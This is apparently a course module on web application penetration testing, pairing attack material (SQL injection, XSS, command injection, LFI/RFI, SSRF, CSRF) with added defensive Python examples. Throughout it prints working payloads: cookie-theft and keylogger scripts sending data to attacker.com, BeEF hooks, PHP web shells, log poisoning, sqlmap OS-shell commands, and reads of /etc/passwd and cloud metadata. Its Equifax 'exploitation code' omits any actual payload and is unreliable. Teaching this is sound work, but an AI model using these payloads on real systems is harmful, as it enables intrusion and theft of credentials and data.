Week 6: Web Application Testing
MITRE ATT&CK: Tactic — TA0011 (Initial Access), Technique — T1190 (Exploit Public-Facing Application)
Real-World Attack Scenario: The 2017 Equifax Data Breach (Web Application Attack)
The 2017 Equifax breach affected 147 million people. The attack chain started with a web application vulnerability:
- Vulnerability: CVE-2017-5638 in Apache Struts 2 (Jakarta Multipart parser)
- Attack Vector: Malformed Content-Type header in HTTP request
- Exploitation Code:
```http
GET / HTTP/1.1
Host: portal.equifax.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
```
  When Struts parsed this header incorrectly, command injection occurred.
- Initial Shell: Attackers gained command execution as the web server user
- Discovery: Found plaintext credentials in configuration files
- Lateral Movement: Used stolen DB credentials to access customer data databases
- Exfiltration: Exported 147 million records via CSV files
Why this week matters: 83% of breaches involve web application vulnerabilities (Verizon DBIR). Every week, new CVEs in WordPress, Drupal, Apache Struts, and other web frameworks are actively exploited. Understanding OWASP Top 10 isn't optional — it's essential survival.
Objectives
- Master OWASP Top 10 vulnerabilities
- Become proficient with Burp Suite
- Identify and exploit common web vulnerabilities
- Understand web attack chains and chaining techniques
OWASP Top 10 (2021)
1. Broken Access Control - IDOR, privilege escalation, path traversal
2. Cryptographic Failures - Sensitive data exposure, weak crypto
3. Injection - SQL, NoSQL, OS, LDAP, XSS, Command
4. Insecure Design - Business logic flaws, missing rate limits
5. Security Misconfiguration - Default creds, verbose errors, misconfigs
6. Vulnerable Components - Outdated libraries, unpatched deps
7. Authentication Failures - Brute force, session hijacking, weak passwords
8. Software Integrity - CI/CD injection, unsigned updates
9. Logging Failures - No audit trail, missing forensics
10. SSRF - Server-side request forgery
Burp Suite Fundamentals
Setup
```bash
# Kali Linux includes Burp Suite
burpsuite
# Or community edition
burpsuite --collaborator
# Configure proxy
# Firefox: Preferences → Network Settings → Manual proxy → 127.0.0.1:8080
# Enable interception
# CA certificate: Proxy → Options → Import/export CA certificate
```
Key Features
| Tab | Use |
|---|---|
| Proxy → Intercept | Capture/modify requests |
| Proxy → HTTP History | All requests/responses |
| Target → Site Map | Discovered endpoints |
| Intruder | Fuzzing, parameter enumeration |
| Repeater | Manual request manipulation |
| Decoder | Encode/decode, hash |
| Comparer | Diff two responses |
| Sequencer | Entropy analysis |
| Extender | BApp store, custom |
Proxy Operations
```bash
# Intercept toggle: Intercept is on/off
# Forward: Send request to server
# Drop: Discard request
# Action: Send to other tools
```
Site Map & Scope
```bash
# Set scope
# Target → Scope → Add include pattern: ^https?://10\.0\.0\.5.*
# Right-click → Add to scope
# Spider
# Right-click host → Spider this host
# Crawls forms, links, parameters
```
Intruder (Fuzzer)
```bash
# Attack types
Sniper - Single payload set, one position
Battering Ram - Single payload set, all positions
Pitchfork - Multiple payload sets, position-matched
Cluster Bomb - Multiple payload sets, all combinations
# Positions (§ §)
GET /api/user?id=§123§ HTTP/1.1
# Payloads
Simple list - Load wordlist
Runtime file - Read from file
Numbers - Sequence or range
Dates - Date patterns
Brute forcer - Character set + length
# Grep
Add grep match: "username"
Add grep extract: Extract session token from response
```
SQL Injection
Theory
```sql
-- In PHP: "SELECT * FROM users WHERE id = " . $user_id
-- Attacker enters: 1 OR 1=1
-- Result: SELECT * FROM users WHERE id = 1 OR 1=1
-- Union injection
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT table_name FROM information_schema.tables--
-- Boolean blind
' OR 1=1--
' AND 1=2-- (false, observe different response)
-- Time-based blind
' OR SLEEP(5)--
' OR IF(1=1,SLEEP(3),0)--
-- Stacked queries (if ; supported)
'; DROP TABLE users;--
'; SELECT * FROM users;--
```
Detection Checklist
1. Try: ' (single quote)
2. Try: " (double quote)
3. Try: \ (backslash)
4. Try: -- (comment)
5. Try: /* (block comment)
6. Try: OR 1=1
7. Try: AND 1=2
8. Check for different responses (error vs normal)
SQLMap (Automated)
```bash
# Basic usage
sqlmap -u "http://10.0.0.5/page.php?id=1"
# With POST data
sqlmap -u "http://10.0.0.5/login.php" --data="user=admin&pass=secret"
# With cookies
sqlmap -u "http://10.0.0.5/page.php?id=1" --cookie="PHPSESSID=abc123"
# Database enumeration
sqlmap -u "http://10.0.0.5/page.php?id=1" --dbs
sqlmap -u "http://10.0.0.5/page.php?id=1" -D database_name --tables
sqlmap -u "http://10.0.0.5/page.php?id=1" -D database_name -T users --columns
sqlmap -u "http://10.0.0.5/page.php?id=1" -D database_name -T users -C username,password --dump
# Level/Risk
sqlmap -u "http://10.0.0.5/page.php?id=1" --level=5 --risk=3
# OS shell
sqlmap -u "http://10.0.0.5/page.php?id=1" --os-shell
sqlmap -u "http://10.0.0.5/page.php?id=1" --os-pwn # Meterpreter
# Crawl
sqlmap -u "http://10.0.0.5" --crawl=2 --batch
```
SQL Injection Examples
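Before the payload lists, an added example (not from the course material) that shows why they work: the string-concatenation bug from the Theory section next to its parameterized fix. sqlite3 stands in for the PHP/MySQL stack so it runs offline; the users table, rows and plaintext passwords are constructed for the demo.

```python
# Added example (not from the course material): the concatenation bug from the
# Theory section next to its parameterized fix. sqlite3 stands in for the
# PHP/MySQL stack so it runs offline; the users table and rows are constructed
# (real systems store password hashes, not plaintext).
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "alice", "hunter2"), (3, "bob", "letmein")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    # Input pasted into the SQL text: "1 OR 1=1" becomes part of the WHERE clause.
    sql = "SELECT username FROM users WHERE id = " + user_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, user_id):
    # Bound parameter: the driver sends the value separately from the SQL text,
    # so "1 OR 1=1" is compared to id as a literal string and matches nothing.
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def login_vulnerable(conn, username, password):
    # The classic bypass: admin' -- closes the string and comments out the
    # password check; ' OR 1=1-- makes every row match.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    # Same query with both values bound; the quote in the input is just data.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]
```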
Authentication Bypass
```sql
admin' --
admin' #
admin'/*
' OR 1=1--
' OR 1=1 #
' OR 1=1/*
' OR '1'='1
' OR '1'='1'--
' OR '1'='1' #
' OR '1'='1'/*
' OR 1=1 LIMIT 1--
```
UNION-based Extract Data
```sql
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL-- (find correct column count)
' UNION SELECT version(),user(),database()--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password,NULL FROM users--
```
Cross-Site Scripting (XSS)
Types
Reflected: JS in URL param, reflected in response (phishing delivery)
Stored: JS saved in DB, served to all users (most dangerous)
DOM-based: JS executes via client-side modification of DOM
Payloads
```javascript
<script>alert(document.domain)</script>
<img src=x onerror="alert(1)">
<svg onload="alert(1)">
<iframe src="javascript:alert('XSS')">
<a href="javascript:alert('XSS')">click</a>
<div onclick="alert('XSS')">click
<body onload="alert('XSS')">
// Cookie theft
<script>new Image().src="http://attacker.com/steal?c="+document.cookie</script>
// Keylogger
<script>document.onkeypress=function(e){fetch('http://attacker.com/log?k='+e.key)}</script>
// Screen capture (requires user interaction)
<script>
navigator.mediaDevices.getUserMedia({video:true}).then(stream=>{
// Send stream to attacker
});
</script>
```
Finding XSS
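The manual probes in this section's list find XSS when the probe comes back reflected without encoding; the added example below (not from the course material) runs that check against a vulnerable and an escaped render of a hypothetical search page, and shows the cookie flag that blanks the cookie-theft payload above. The probes, page template and cookie name are constructed.

```python
# Added example (not from the course material): a vulnerable and an escaped
# render of a hypothetical search page, the "reflected unescaped?" check run
# over constructed probes, and the cookie flag that blocks document.cookie theft.
import html

PROBES = [
    '"><script>alert(1)</script>',
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
]


def render_vulnerable(query):
    # Raw interpolation into HTML text and into a quoted attribute value.
    return ('<p>Results for: ' + query + '</p>\n'
            '<input type="search" value="' + query + '">')


def render_safe(query):
    # html.escape(quote=True) turns < > & " ' into entities, which is enough for
    # HTML text and quoted attribute contexts (JS and URL contexts need more).
    safe = html.escape(query, quote=True)
    return ('<p>Results for: ' + safe + '</p>\n'
            '<input type="search" value="' + safe + '">')


def reflected_unescaped(body, probe):
    # Same logic as the manual test: the probe came back byte-for-byte, so the
    # browser will parse the injected tag as markup.
    return probe in body


def scan(render):
    # Which probes a page reflects unescaped; an empty list means none did.
    return [p for p in PROBES if reflected_unescaped(render(p), p)]


def session_cookie_header(value):
    # HttpOnly keeps the cookie out of document.cookie, so the cookie-theft
    # payload above receives nothing; Secure and SameSite limit where it is sent.
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % value
```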
```bash
# Manual
'"><script>alert(1)</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
# Burp Intruder wordlist
# /usr/share/wordlists/wfuzz/XSS.*
# /usr/share/wordlists/payloads/xss*
# Automated
xsser -u "http://10.0.0.5/page?param=test"
# or use Nuclei templates
```
BeEF (Browser Exploitation Framework)
```bash
# Start
beef-xss
# Hook URL: http://127.0.0.1:3000/hook.js
# Inject: <script src="http://ATTACKER/hook.js"></script>
# In BeEF panel:
# Commands → Browser → Get Cookie
# Commands → Browser → Redirect
# Commands → Social Engineering → Fake Flash Update
```
Command Injection
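As an added example (not from the course material), the pattern the detection list below targets, a ping endpoint that builds a shell string from a parameter, beside the argv form that gives the shell nothing to interpret, plus a check for the same separators on the detection side. The ping endpoint, host parameter and sample inputs are constructed.

```python
# Added example (not from the course material): a hypothetical ping endpoint
# built as a shell string versus an argv list, and a detector for the
# separators used in the detection list. Inputs are constructed samples.
import re
import subprocess

# The separators from the detection list, in the order they are reported.
SHELL_META = [";", "|", "&", "$(", "`", "\n"]
# Hostname or IPv4 literal only: no spaces, quotes or shell metacharacters.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def find_shell_metachars(value):
    # Detection side: which injection separators appear in a parameter value.
    return [m for m in SHELL_META if m in value]


def vulnerable_command(host):
    # A shell string: /bin/sh interprets ; | && $( ) and backticks in `host`
    # as command separators, so "10.0.0.5; whoami" runs two commands.
    return "ping -c 1 " + host


def safe_argv(host):
    # Validate first, then build argv. With shell=False there is no shell to
    # interpret metacharacters; the value reaches ping as one argument.
    if not HOST_RE.match(host):
        raise ValueError("invalid host")
    return ["ping", "-c", "1", host]


def run_ping(host):
    # Executes with an argv list and no shell; not exercised by the test.
    result = subprocess.run(safe_argv(host), capture_output=True, text=True, timeout=5)
    return result.returncode
```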
Detection
```bash
# Try these in a parameter that might execute commands
; whoami
| whoami
& whoami
&& whoami
|| whoami
; whoami;
$(whoami)
`whoami`
```
Filter Bypass
```bash
# Space bypass
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}
# Encoding
echo%20"test"
echo"test"
# Chaining
;ls
|ls
&ls
\nls
# PHP functions
<?php echo system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>
```
Path Traversal / Local File Inclusion (LFI)
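An added example (not from the course material) of the defensive counterpart to the traversal payloads in this section: decode the value fully, reject null bytes, then canonicalize against a fixed web root and refuse anything that resolves outside it. The web root directory and all inputs are constructed; the directory need not exist.

```python
# Added example (not from the course material): resolving a user-supplied file
# name under a fixed base directory so the ../, double-encoded and null-byte
# variants are refused. WEBROOT is a constructed path that need not exist.
import os
import tempfile
from urllib.parse import unquote

WEBROOT = os.path.join(tempfile.gettempdir(), "webroot")  # constructed base dir


def decode_fully(value, rounds=3):
    # Undo repeated percent-encoding (..%252f -> ..%2f -> ../) before checking,
    # so the check sees what the filesystem would see.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_under(base_dir, user_path):
    # Returns the absolute path if it stays inside base_dir, otherwise None.
    candidate = decode_fully(user_path)
    if "\x00" in candidate:
        return None  # null byte: the truncation trick against old PHP
    candidate = candidate.replace("\\", "/")  # treat Windows separators as separators
    base = os.path.realpath(base_dir)
    # realpath collapses every .. lexically, so "....//" is not special here:
    # it is a harmless directory named "....", which only defeats strip-once filters.
    full = os.path.realpath(os.path.join(base, candidate.lstrip("/")))
    if full != base and not full.startswith(base + os.sep):
        return None
    return full
```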
Path Traversal
```bash
# Basic
../../etc/passwd
....//....//....//etc/passwd
# Null byte (old PHP)
../../etc/passwd%00
# Double encoding
..%252f..%252f..%252fetc/passwd
# Linux files
/etc/passwd
/etc/hosts
/proc/self/environ
/proc/net/tcp
/proc/[pid]/cmdline
# Windows
C:\Windows\System32\drivers/etc/hosts
C:\Windows\win.ini
```
LFI → RCE
```bash
# Log poisoning
# Inject PHP into Apache access log
curl "http://10.0.0.5" -A "<?php system(\$_GET['cmd']); ?>"
# Then access log via LFI
http://10.0.0.5/index.php?page=../../var/log/apache2/access.log&cmd=whoami
# PHP session files
# Usually /var/lib/php/sessions/sess_[PHPSESSID]
# Write shell via registration form or login
# /proc/self/fd/ - read file descriptors
```
Remote File Inclusion (RFI)
```bash
# If allow_url_include enabled
http://10.0.0.5/index.php?page=http://attacker.com/shell.txt
# shell.txt contains <?php system($_GET['cmd']); ?>
```
SSRF (Server-Side Request Forgery)
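An added example (not from the course material) of the server-side check that refuses the targets listed in this section before the application fetches a user-supplied URL: scheme allowlist, blocked metadata hostnames, and address-range checks after resolution. The resolver is injectable so it runs offline; hostnames and addresses in the test are constructed.

```python
# Added example (not from the course material): validating a fetch URL so the
# loopback, link-local metadata, private and file:// targets are refused.
# The resolver is a parameter so the check can be tested offline.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # no file://, gopher://, ftp://
BLOCKED_NAMES = {"localhost", "metadata.google.internal"}


def _resolve(host):
    # Default resolver; tests substitute a fake one.
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_safe_url(url, resolve=_resolve):
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    host = parts.hostname.lower().rstrip(".")
    if host in BLOCKED_NAMES or host.endswith(".localhost"):
        return False
    try:
        addrs = [ipaddress.ip_address(host)]  # literal, e.g. 169.254.169.254
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        except (socket.gaierror, ValueError):
            return False
    for addr in addrs:
        # Private (10.0.0.5:22, 3306), loopback, link-local (the AWS metadata
        # address), reserved and multicast ranges are all refused. DNS rebinding
        # can change the answer between this check and the fetch, so the fetch
        # should connect to the address checked here, not re-resolve the name.
        if (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_reserved or addr.is_multicast or addr.is_unspecified):
            return False
    return True
```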
Detection
```bash
# Test for SSRF in URL parameters
# Point to internal services
http://localhost/
http://127.0.0.1:80/
http://169.254.169.254/ # AWS metadata
http://metadata.google.internal/ # GCP metadata
http://169.254.169.254/latest/user-data/ # AWS user data
```
Exploitation
```bash
# Port scan internal network
http://10.0.0.5/?url=http://10.0.0.5:22
http://10.0.0.5/?url=http://10.0.0.5:3306
# Read local files
http://10.0.0.5/?url=file:///etc/passwd
http://10.0.0.5/?url=file:///var/www/html/config.php
# AWS metadata
http://10.0.0.5/?url=http://169.254.169.254/latest/meta-data/
http://10.0.0.5/?url=http://169.254.169.254/latest/user-data/
# Internal web admin
http://10.0.0.5/?url=http://localhost:8080/admin
```
Business Logic Vulnerabilities
IDOR (Insecure Direct Object Reference)
```bash
# Find numeric IDs in URLs
http://site.com/account?id=123
# Manipulate
http://site.com/account?id=124
http://site.com/account?id=1
# In JSON bodies
{"user_id": 123} → {"user_id": 124}
# Tools
# Authz (Burp extension) - automated IDOR detection
```
Race Conditions
```bash
# Gift card reuse
# Transfer funds double-spend
# Coupon code reuse
# Attack with multiple concurrent requests
# Use Burp Intruder with multiple threads
```
CSRF (Cross-Site Request Forgery)
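The detection step in this section asks whether a token exists and is actually checked server-side; the added example below (not from the course material) shows a session-bound token and the handler check that makes the auto-submitting form in the Exploitation block fail. The server secret, session ids, site origin and form dictionaries are constructed.

```python
# Added example (not from the course material): a per-session CSRF token and
# the server-side validation a password-change handler must perform. Secret,
# session ids and the site origin are constructed for the demo.
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)  # constructed: in practice a stable stored key
SITE_ORIGIN = "https://10.0.0.5"        # constructed: the application's own origin


def csrf_token(session_id, secret=SERVER_SECRET):
    # Derived from the session id, so a token minted for the attacker's own
    # session is useless against the victim's session.
    return hmac.new(secret, ("csrf:" + session_id).encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id, submitted, secret=SERVER_SECRET):
    # Constant-time comparison; a missing or foreign token fails.
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token(session_id, secret), submitted)


def change_password(session_id, form, origin=None):
    # The POST handler the forged form targets. The browser attaches the
    # victim's session cookie, but the attacker's page cannot read or
    # forge the token, and a cross-site POST carries a foreign Origin.
    if origin is not None and origin != SITE_ORIGIN:
        return "rejected: cross-origin"
    if not csrf_token_valid(session_id, form.get("csrf_token")):
        return "rejected: bad csrf token"
    return "password changed"
```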
Detection
```bash
# Check if CSRF token exists
# Check if token is validated server-side
# Without token - likely vulnerable
# With token - verify it's actually checked
```
Exploitation
```html
<html>
<body>
<form action="http://10.0.0.5/changepassword" method="POST">
<input type="hidden" name="password" value="hacked" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```
Practice Labs
Lab 1: DVWA (Damn Vulnerable Web App)
```bash
# On Kali or Metasploitable
# DVWA at http://10.0.0.5/dvwa
# Set security level: low, medium, high
# Test: SQLi, XSS, CSRF, IDOR, LFI
```
Lab 2: SQL Injection
```bash
# Use Burp Suite to intercept login
# Try SQL injection bypasses
admin' --
# Check response
# Use SQLMap
sqlmap -u "http://10.0.0.5/sqli.php?id=1" --batch --dbs
```
Lab 3: XSS with BeEF
```bash
# Find reflected XSS in DVWA
# Inject BeEF hook
<script src="http://KALI_IP:3000/hook.js"></script>
# Open BeEF panel, explore victim browser
```
Key Takeaways
- Burp Suite — master Proxy, Repeater, Intruder, Decoder
- SQL injection — understand UNION, boolean blind, time-based blind
- XSS — reflected, stored, DOM-based; steal cookies, keylog
- LFI/RFI — read files, poison logs, gain shell
- SSRF — port scan internal, fetch metadata, read files
- Chain vulnerabilities — often need multiple vulns for full pwn
Next Week Preview
Week 7 covers Network Penetration Testing — SMB, FTP, SSH, RDP attacks, relay techniques, and lateral movement in Windows/Active Directory environments.